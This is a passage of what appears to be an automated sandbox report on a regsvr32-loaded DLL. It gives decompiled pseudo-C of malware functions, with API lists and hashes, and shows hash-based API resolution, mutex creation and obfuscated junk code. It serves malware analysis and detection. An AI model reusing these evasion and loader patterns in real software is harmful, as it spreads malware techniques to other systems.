                                				void* _t72;
                                				long long _t74;
                                				long long* _t75;
                                				void* _t81;
                                				signed long long* _t84;
                                				void* _t89;
                                				void* _t90;
                                
                                				_t84 = __r9;
                                				_t54 = __rax;
                                				_a16 = __rbx;
                                				_a24 = __rbp;
                                				_t73 =  *0x73d458;
                                				_t75 = __r9;
                                				_t46 = r8d;
                                				_t89 = __rdx;
                                				_t90 = __rcx;
                                				if(__rdx == 0 || r8d == 0) {
                                					 *_t84 =  *_t84 & 0x00000000;
                                					 *_a40 =  *_a40 & 0x00000000;
                                					_t39 = 0;
                                				} else {
                                					E0073908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t73 + 0x10)));
                                					if(_t54 != 0) {
                                						 *_t54();
                                					}
                                					_t72 = _t90 + 0x72;
                                					r14d = 0x10;
                                					_t81 = _t90;
                                					L007347B0();
                                					E0073908C(0x8d72aad2, _t54,  *((intOrPtr*)(_t73 + 0x10)));
                                					if(_t54 != 0) {
                                						 *_t54();
                                					}
                                					_v64 = _v64 & 0x00000000;
                                					_a8 = _a8 & 0x00000000;
                                					_v72 = _v72 & 0x00000000;
                                					r8d = 0;
                                					_t31 = E00734F7C(_t46, _t89, _t72, _t81,  &_a8);
                                					_t39 = _t31;
                                					if(_t31 == 0x7a) {
                                						r8d = _a8;
                                						HeapAlloc(??, ??, ??);
                                						_t74 = _t54;
                                						if(_t54 == 0) {
                                							_t39 = 8;
                                						} else {
                                							_t18 =  &_v56; // 0xfb849f4f
                                							_v64 = r14d;
                                							_v72 = _t18;
                                							_t33 = E00734F7C(_t46, _t89, _t72, _t74,  &_a8); // executed
                                							_t39 = _t33;
                                							if(_t33 != 0) {
                                								HeapFree();
                                							} else {
                                								 *_t75 = _t74;
                                								 *_a40 = _a8;
                                							}
                                						}
                                					}
                                				}
                                				return _t39;
                                			}

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • HeapAlloc.KERNEL32 ref: 00737DB2
                                • HeapFree.KERNEL32 ref: 00737E02
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocErrorFreeLast
                                • String ID: uJ
                                • API String ID: 796569475-2850656762
                                • Opcode ID: b9ef0ca706fd99b697d0d6878eb9cb5900bb783f814b50af44875247110de7d7
                                • Instruction ID: 908f9c11d0d2281a3aa465198ee2f86c0ed8e9a44099c47f187a5b9df93ece11
                                • Opcode Fuzzy Hash: b9ef0ca706fd99b697d0d6878eb9cb5900bb783f814b50af44875247110de7d7
                                • Instruction Fuzzy Hash: D1316B66718B8486EB28DF26E44475AB3A0FB98BD4F584425EF8947B1ADF3CC945CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E0073A7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9) {
                                				void* __rsi;
                                				void* __rbp;
                                				intOrPtr _t25;
                                				void* _t32;
                                				intOrPtr _t36;
                                				void* _t37;
                                				void* _t46;
                                				long long* _t56;
                                				long long* _t57;
                                				long long _t58;
                                				intOrPtr _t72;
                                				long long _t74;
                                				void* _t82;
                                				void* _t83;
                                				intOrPtr* _t91;
                                
                                				_t58 = __rbx;
                                				_t56 = __rax;
                                				_t46 = __edi;
                                				 *((long long*)(_t82 + 8)) = __rbx;
                                				_t83 = _t82 - 0x50;
                                				_t76 =  *0x73d458;
                                				_t72 =  *0x73d448;
                                				_t91 = __rcx;
                                				 *((intOrPtr*)(_t83 + 0x30)) = 0x18;
                                				_t36 = 0;
                                				 *((intOrPtr*)(_t83 + 0x40)) = 0;
                                				E0073908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0x73d458 + 0x20)));
                                				if(_t56 == __rbx) {
                                					_t25 = 0;
                                				} else {
                                					r9d = 0; // executed
                                					_t25 =  *_t56(); // executed
                                				}
                                				if(_t25 != _t36) {
                                					r9d = 0;
                                					 *((intOrPtr*)(_t83 + 0x88)) =  *_t91;
                                					_t57 = _t83 + 0x90;
                                					 *((long long*)(_t83 + 0x20)) = _t57;
                                					E00731000(_t36, _t37, _t46, _t57, _t58, _t83 + 0x88, _t76, 0x730000, _t72 + 0x741178);
                                					if(_t57 != _t58) {
                                						E0073908C(0x3ff22481, _t57,  *((intOrPtr*)(_t76 + 0x18)));
                                						if(_t57 == _t58) {
                                							_t74 = _t58;
                                						} else {
                                							CreateMutexW(); // executed
                                							_t74 = _t57;
                                						}
                                						if(_t74 != _t58) {
                                							E0073908C(0xc06f8334, _t57,  *((intOrPtr*)(_t76 + 0x18)));
                                							if(_t57 == _t58) {
                                								_t32 = 0x7f;
                                							} else {
                                								_t32 =  *_t57();
                                							}
                                							if(_t32 != 0xb7) {
                                								 *((long long*)(_t91 + 0x18)) = _t74;
                                								_t36 = 1;
                                							} else {
                                								E0073908C(0xa219a077, _t57,  *((intOrPtr*)(_t76 + 0x18)));
                                								if(_t57 != _t58) {
                                									 *_t57();
                                								}
                                							}
                                						}
                                						HeapFree();
                                					}
                                				}
                                				return _t36;
                                			}

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0073A800
                                • CreateMutexW.KERNELBASE ref: 0073A86E
                                • HeapFree.KERNEL32 ref: 0073A8CC
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ConvertCreateErrorFreeHeapLastMutexString
                                • String ID:
                                • API String ID: 2454944130-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: 3976c3380d8546e155292f2d59766d536f13726a74561c788ff14df26c5ddcca
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: 3131B0327046C5EAEB21DF51E4457DAB3A0F798784F4848229F8E43706DE3CE58AC752
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E00007FFC7FFC130EB89C(void* __ecx) {
                                				void* __rbx;
                                				void* _t7;
                                				void* _t8;
                                				void* _t9;
                                				void* _t19;
                                				void* _t20;
                                
                                				_t8 = __ecx;
                                				E00007FFC7FFC130EBDF4(_t7, _t9, ( *0x131241f8 & 0x000000ff) + 0x3893f, 0x1, _t19, _t20);
                                				if (E00007FFC7FFC130EC7DC() != 0) goto 0x130eb8cb;
                                				goto 0x130eb8df; // executed
                                				E00007FFC7FFC130EE090(( *0x131241f8 & 0x000000ff) + 0x3893f); // executed
                                				if (0 != 0) goto 0x130eb8dd;
                                				E00007FFC7FFC130EC838(_t8);
                                				goto 0x130eb8c7;
                                				return _t7;
                                			}

                                APIs
                                • __isa_available_init.LIBCMT ref: 00007FFC130EB8B9
                                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC130EB8BE
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC130EC7E0
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC130EC7E5
                                  • Part of subcall function 00007FFC130EC7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC130EC7EA
                                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC130EB8D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                • String ID:
                                • API String ID: 3388242289-0
                                • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction ID: 2e6de87951bdce05e13e226305b4458111acbcaf336990c934c9e8c891d01c1f
                                • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                                • Instruction Fuzzy Hash: A2E09240F0CEAF06FD54266211522B81BD00F2532CF210475D8AD722C3CE0D74BAE635
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E00735168(void* __ecx, void* __ebp, signed long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r11, long long _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                                				long long _v72;
                                				long long _v88;
                                				void* __rsi;
                                				void* __rbp;
                                				intOrPtr _t38;
                                				intOrPtr _t40;
                                				void* _t41;
                                				void* _t42;
                                				void* _t49;
                                				void* _t50;
                                				void* _t51;
                                				long long _t59;
                                				signed long long _t61;
                                				signed long long _t75;
                                				void* _t76;
                                				long long _t77;
                                				void* _t89;
                                				void* _t91;
                                				intOrPtr* _t93;
                                				void* _t95;
                                				long long _t96;
                                				long long _t97;
                                
                                				_t91 = __r11;
                                				_t89 = __r9;
                                				_t61 = __rbx;
                                				_t51 = __ebp;
                                				_t42 = __ecx;
                                				_a16 = __rbx;
                                				_a8 = __rcx;
                                				_t59 =  *0x73d458;
                                				_t50 = r8d;
                                				_t95 = __rdx;
                                				_t96 = __rcx;
                                				_t49 = 0;
                                				_v72 =  *((intOrPtr*)(_t59 + 8));
                                				_t8 = _t75 + 8; // 0x8
                                				r13d = _t8;
                                				HeapAlloc(??, ??, ??);
                                				_t77 = _t59;
                                				if(_t59 != 0) {
                                					_t41 = 0;
                                					if(_t50 != 0) {
                                						_t10 = _t95 + 0x20; // 0x734f21
                                						_t93 = _t10;
                                						while(1) {
                                							E007330A4(_t42, _t59, _t61, _t96, _t76, _t95 + (_t61 + _t61 * 4) * 8, _t91);
                                							_t97 = _t59;
                                							if(_t59 == 0) {
                                								break;
                                							}
                                							_t15 = _t93 - 8; // 0x5d415e4120c48348
                                							r9d =  *_t15;
                                							_t59 = _t77 + (_t75 + _t75 * 2) * 8;
                                							_v88 = _t59;
                                							_t38 = E00735638(_t41, _t42, _t51, _t61, _a8, _t97,  *_t93, _t89, _t91); // executed
                                							_a24 = _t38;
                                							HeapFree(??, ??, ??);
                                							_t40 = _a24;
                                							if(_t40 != 0) {
                                								_t96 = _a8;
                                								_t41 = _t41 + 1;
                                								_t49 = _t49 + _t40;
                                								_t93 = _t93 + 0x28;
                                								if(_t41 < _t50) {
                                									continue;
                                								}
                                							}
                                							break;
                                						}
                                						r13d = 8;
                                					}
                                					if(_t41 == _t50) {
                                						_v88 = _a64;
                                						r13d = E007392D4(_t41, _t42, _t49, _t61, _t77, _a48, _a56, _t91);
                                					}
                                					E0073885C(_t49, _t61, _t77, _t76);
                                					HeapFree(??, ??, ??);
                                				}
                                				return r13d;
                                			}


























                                APIs
                                • HeapAlloc.KERNEL32 ref: 007351B1
                                • HeapFree.KERNEL32 ref: 00735296
                                  • Part of subcall function 007330A4: HeapAlloc.KERNEL32 ref: 00733108
                                  • Part of subcall function 00735638: SleepEx.KERNEL32(00000000,00735217), ref: 0073568F
                                  • Part of subcall function 00735638: HeapAlloc.KERNEL32 ref: 0073573B
                                • HeapFree.KERNEL32 ref: 00735226
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free$Sleep
                                • String ID:
                                • API String ID: 1163062789-0
                                • Opcode ID: 3a5c3fa052809e7fc05be192fc8f2ea2de74623612a3d96ea4b3a5664d0ead34
                                • Instruction ID: 1b570355a814479d072bc88a40fe64f60c2997af0e163230ad068f0ce848312f
                                • Opcode Fuzzy Hash: 3a5c3fa052809e7fc05be192fc8f2ea2de74623612a3d96ea4b3a5664d0ead34
                                • Instruction Fuzzy Hash: 2931AA76604F8196EB25DB52A84479AB3A1F788BC8F448026EE8D83715EF3CD54AC740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E007324B0(void* __ebx, void* __ecx, void* __eflags, long long __rbx, void** __rdx, long long __rsi) {
                                				signed long long _t29;
                                				int _t47;
                                				void* _t50;
                                				long long _t73;
                                				long long _t90;
                                				long long _t95;
                                				void* _t97;
                                				void* _t98;
                                				void* _t104;
                                				long long _t106;
                                				void* _t108;
                                
                                				_t75 = __rbx;
                                				_t104 = _t97;
                                				 *((long long*)(_t104 + 8)) = __rbx;
                                				 *((long long*)(_t104 + 0x10)) = _t95;
                                				 *((long long*)(_t104 + 0x20)) = __rsi;
                                				_push(_t90);
                                				_push(_t108);
                                				_t98 = _t97 - 0x30;
                                				_t73 =  *0x73d458;
                                				_t5 = _t104 + 0x18; // 0xfb849f5f
                                				E00739A38(__ebx, _t73, __rbx, _t5, __rdx,  *((intOrPtr*)(_t73 + 8)));
                                				_t7 = _t98 + 0x70; // 0xfb849f8f
                                				_t29 = E00735BA4(_t7);
                                				_t8 = _t98 + 0x70; // 0xfb849f8f
                                				r13d = _t29;
                                				r13d = r13d - ((r13d - (0x24924925 * r13d >> 0x20) >> 1) + (0x24924925 * r13d >> 0x20) >> 2) * 7;
                                				E00735BA4(_t8);
                                				_t13 = _t98 + 0x70; // 0xfb849f8f
                                				_t18 = _t108 + 3; // 0x3
                                				_t47 = E007313EC(0x24924925, __ecx, _t18, _t73, _t75, _t13);
                                				_t106 = _t73;
                                				if(_t73 != 0) {
                                					_t19 = _t95 + 3; // 0x3
                                					_t20 = _t98 + 0x70; // 0xfb849f8f
                                					E007313EC(0x24924925, __ecx, _t19, _t73, _t75, _t20);
                                					if(_t73 != 0) {
                                						_t22 = _t108 + 0xd; // 0xd
                                						r8d = _t95 + _t22;
                                						_t50 = HeapAlloc(??, ??, ??); // executed
                                						_t90 = _t73;
                                						if(_t73 != 0) {
                                							 *((long long*)(_t98 + 0x20)) = _t106;
                                							L0073B158();
                                							 *__rdx = _t50;
                                						}
                                						HeapFree();
                                					}
                                					_t47 = HeapFree();
                                				}
                                				return _t47;
                                			}















                                APIs
                                  • Part of subcall function 007313EC: HeapAlloc.KERNEL32 ref: 00731456
                                • HeapAlloc.KERNEL32 ref: 00732572
                                • HeapFree.KERNEL32 ref: 007325A9
                                • HeapFree.KERNEL32 ref: 007325B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocFree
                                • String ID:
                                • API String ID: 1379380650-0
                                • Opcode ID: 6319a469fd09f79597659ee7f8e00f8cd3230aed5a594dea25eb0ec95d591eb3
                                • Instruction ID: 7c292339d9ef3be8366ce4e338c411491568f1f9616483951fe6164963ee3545
                                • Opcode Fuzzy Hash: 6319a469fd09f79597659ee7f8e00f8cd3230aed5a594dea25eb0ec95d591eb3
                                • Instruction Fuzzy Hash: 9E318126704B8986EB05DB3AE84574977A5F788B84F898131AE5C87765EF3CE606C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 80%
                                			E00007FFC7FFC130EA970(void* __rax, void* __rcx, signed int __rdi, long long __rsi, void* __r8, void* __r10, long long __r12) {
                                				void* __rbx;
                                				void* __rbp;
                                				void* __r13;
                                				void* __r14;
                                				void* __r15;
                                				void* _t99;
                                				void* _t103;
                                				void* _t105;
                                				signed int _t108;
                                				void* _t113;
                                				void* _t114;
                                				intOrPtr _t117;
                                				intOrPtr _t118;
                                				signed int _t123;
                                				long long _t125;
                                				intOrPtr _t132;
                                				signed long long _t133;
                                				signed long long _t136;
                                				signed int _t149;
                                				signed int _t150;
                                				long long _t168;
                                				void* _t171;
                                				long long _t172;
                                				void* _t176;
                                				void* _t177;
                                				void* _t180;
                                				void* _t182;
                                				long long _t184;
                                				void* _t186;
                                				void* _t188;
                                				void* _t190;
                                
                                				_t182 = _t176;
                                				 *(_t182 + 0x18) = r8d;
                                				_t177 = _t176 - 0xa0;
                                				_t117 =  *((intOrPtr*)(_t177 + 0x148));
                                				r15d =  *(_t177 + 0x100);
                                				r14d =  *(_t177 + 0x110);
                                				_t172 = __rcx - 0x36e7;
                                				r15d = r15d + 0x119f;
                                				 *((long long*)(_t177 + 0xd0)) = __rcx - 0x44a;
                                				r10d = _t117 - 0x283;
                                				 *(_t177 + 0x84) = r15d;
                                				r13d = _t117 + 0x170;
                                				 *(_t177 + 0x80) = r10d;
                                				_t118 =  *((intOrPtr*)(_t177 + 0x138));
                                				r14d = r14d + 0x9d7;
                                				 *(_t177 + 0x88) = r14d;
                                				 *((long long*)(_t177 + 0x148)) = _t172;
                                				r8d = _t118 - 0x16a;
                                				r9d = _t118 + 0xd93;
                                				 *(_t177 + 0x100) = r8d;
                                				_t19 = _t136 + 0x2598; // 0x2598
                                				 *(_t177 + 0x110) = r9d;
                                				if (r13d - _t99 < 0) goto 0x130eae64;
                                				 *((long long*)(_t182 + 0x10)) = __rsi;
                                				 *((long long*)(_t182 - 0x30)) = __rdi;
                                				 *((long long*)(_t182 - 0x38)) = __r12;
                                				if (r15d == __r10 - 0x173a) goto 0x130eacf1;
                                				_t184 =  *((intOrPtr*)(_t177 + 0x130));
                                				r10d = 0x3a59;
                                				r9d = r10d;
                                				 *(_t177 + 0x28) = 0x38e9;
                                				 *(_t177 + 0x20) = r10w;
                                				_t108 = r10d;
                                				r8d = 0x23f6; // executed
                                				E00007FFC7FFC130E9AC0(_t136, __rcx, _t184, _t172, _t190); // executed
                                				r11d = _t172 + 0x37e1;
                                				r9d =  *(_t177 + 0x84);
                                				r10d = _t190 + 0x4c4;
                                				r8d = _t186 - 0x14c1;
                                				 *((long long*)(_t177 + 0x78)) = _t184;
                                				_t168 =  *(_t177 + 0x100) + 0x1555;
                                				 *((long long*)(_t184 + 0x340)) = _t19;
                                				r15d = r15d + 0xfffff21d;
                                				r9d = r9d + 0xfffff219;
                                				 *(_t184 + 0x28) =  *(_t184 + 0x28) |  *((intOrPtr*)(_t184 + 0x198)) + 0x0000329d | 0x0000666a;
                                				_t42 = _t136 + 0x27b2; // 0x27b2
                                				_t123 = _t42;
                                				 *(_t177 + 0x110) = _t123;
                                				 *(_t177 + 0x70) = _t123;
                                				r14d = _t186 - 0x17cd;
                                				 *(_t177 + 0x68) = r10d;
                                				 *((intOrPtr*)(_t177 + 0x60)) = r11d;
                                				 *(_t177 + 0x58) = _t136;
                                				 *(_t177 + 0x50) = __rdi;
                                				 *((long long*)(_t177 + 0x48)) =  *((intOrPtr*)(_t177 + 0xe0));
                                				_t125 =  *(_t177 + 0x110);
                                				 *((long long*)(_t177 + 0x40)) = _t168;
                                				 *((long long*)(_t177 + 0x38)) = _t125;
                                				 *((long long*)(_t177 + 0x30)) =  *((intOrPtr*)(_t177 + 0xd0)) + 0xfffff515;
                                				 *(_t177 + 0x28) = r14d;
                                				 *(_t177 + 0x20) = r15d;
                                				_t103 = E00007FFC7FFC130F8680(_t108, _t136,  *((intOrPtr*)(_t177 + 0x148)) + 0x30d5,  *(_t177 + 0x100) + 0xfffffda6, _t168, __r8, _t180, __r10, _t184, _t186, _t190); // executed
                                				 *_t125 =  *_t125 + _t103;
                                				 *(_t177 + 0x28) = 0x343a;
                                				r8d = 0x329d;
                                				 *(_t177 + 0x20) = _t188 + 0x40c;
                                				asm("out dx, eax");
                                				asm("invalid"); // executed
                                				 *((long long*)(_t184 + 0x358)) = _t125;
                                				 *( *_t184 + 0x1e0) =  *( *_t184 + 0x1e0) |  *((intOrPtr*)(_t184 + 0x1b0)) + 0x0000343a;
                                				r8d =  *(_t125 + 0x150);
                                				r8d = r8d ^ 0x000017cd;
                                				_t113 = r8d - _t108;
                                				if (_t113 >= 0) goto 0x130eabf1;
                                				if (_t113 != 0) goto 0x130eabe0;
                                				 *((long long*)(_t184 + 0x198)) =  *((intOrPtr*)(_t184 + 0x198)) + ( *(_t184 + 0xb8) ^ 0x000027b2);
                                				 *0x2032 =  *0x2032 + _t103;
                                				_t114 =  *((intOrPtr*)( *_t184 + 0x130)) - 0x2032;
                                				if (_t114 >= 0) goto 0x130eac25;
                                				if (_t114 != 0) goto 0x130eac17;
                                				 *(_t184 + 0x1b8) =  *(_t184 + 0x1c0) | 0x0000343a;
                                				_t149 =  *(_t177 + 0x80);
                                				r10d = _t186 - 0x4c4;
                                				_t132 =  *((intOrPtr*)(_t184 + 0x140));
                                				r8d = _t186 - 0x1a27;
                                				r11d = _t149 - 0xeb4;
                                				_t78 = _t132 + 0x150; // 0x1f2c350e8b48c4
                                				_t133 =  *_t78 * 0xc329ae00;
                                				_t150 =  *(_t177 + 0x100);
                                				 *(_t184 + 0x158) = _t133;
                                				 *(_t177 + 0x58) = _t133;
                                				r9d = _t150 + 0xefd;
                                				 *(_t177 + 0x50) = r10d;
                                				 *((intOrPtr*)(_t177 + 0x48)) = r11d;
                                				 *((long long*)(_t177 + 0x40)) = _t184;
                                				 *((long long*)(_t177 + 0x38)) = _t149 + 0x3f3;
                                				 *((long long*)(_t177 + 0x30)) = _t150 + 0x13da;
                                				 *(_t177 + 0x28) =  *(_t177 + 0x110);
                                				 *(_t177 + 0x20) = _t168 + 0x70c;
                                				_t105 = E00007FFC7FFC130F9610( *(_t177 + 0x110), _t149 + 0x3f3,  *((intOrPtr*)(_t177 + 0xe0)) + 0xfffff02e,  *((intOrPtr*)(_t177 + 0xe0)) + 0xb4, __r8, _t180, __r10, _t184, _t186, _t188, _t190, _t188, _t186, _t171, _t136); // executed
                                				return _t105;
                                			}



































                                APIs
                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00002103,-00000CDF), ref: 00007FFC130EAD58
                                  • Part of subcall function 00007FFC130E9AC0: GetProcessHeap.KERNEL32(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B22
                                  • Part of subcall function 00007FFC130E9AC0: RtlAllocateHeap.NTDLL(?,?,?,00007FFC130FD72E), ref: 00007FFC130E9B35
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocateObjectProcessSingleWait
                                • String ID: 8
                                • API String ID: 4287835514-406019892
                                • Opcode ID: 12cc14ebfa886b2053cebe09334349d40362fa275ac25661de06008217750727
                                • Instruction ID: d47ef9f54ede6cd88deb67ca670bec40e913a87a435673d09aef5d168ee4430d
                                • Opcode Fuzzy Hash: 12cc14ebfa886b2053cebe09334349d40362fa275ac25661de06008217750727
                                • Instruction Fuzzy Hash: E3D188736086D48BD721CF14E484BDABBA8F788798F040139DB8957B58DB38EA95CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: BoundaryDeleteDescriptorHeapProcess
                                • String ID:
                                • API String ID: 4240333050-0
                                • Opcode ID: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction ID: 5f73246556db8f551803a434a2abb52e996455873a44691966bc438cbf73c2a4
                                • Opcode Fuzzy Hash: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                                • Instruction Fuzzy Hash: B941D272609F9987DB58CB14E5807E9B7A4F784B88F084235DB8D57B44EF38D6A5C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00007FFC7FFC130E9AC0(long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {
                                				void* _t8;
                                				void* _t9;
                                
                                				_a16 = __rbx;
                                				_a24 = __rbp;
                                				r8d =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1a0)) + 0xb0));
                                				r8d = r8d - 0x27b3;
                                				if (_t9 != r8d) goto 0x130e9b07;
                                				return _t8;
                                			}






                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID:
                                • API String ID: 1357844191-0
                                • Opcode ID: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction ID: 416bdeb696cee8df0479d703f5e23b7e69f67396b7a46ea3df2999aaeb1c8561
                                • Opcode Fuzzy Hash: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                                • Instruction Fuzzy Hash: CE118672719B9086EA49CB62E8842AEA3A0F78CBD4F584135DF4D53B49CF38D5A08700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: ff14c0a9bc09fa29a53ecb2845c321d3430fdfcfc2135494fb6c344a7bd47fce
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 75518A73A04B90C6E768CF05F844B5AB7B5F784B94F118219EE8953B15DB3CE8A1DB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 38%
                                			E007388C8(void* __ecx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, long long __rbp, void* __r10, void* _a8, void* _a16, void* _a24, void* _a32) {
                                				long long _v32;
                                				signed int _v40;
                                				void* _t26;
                                				void* _t29;
                                				void* _t33;
                                				void* _t34;
                                				long long _t44;
                                				long long* _t45;
                                				long long _t59;
                                				signed char _t62;
                                				long long* _t65;
                                				long long _t67;
                                				long _t73;
                                				signed char* _t74;
                                				long _t76;
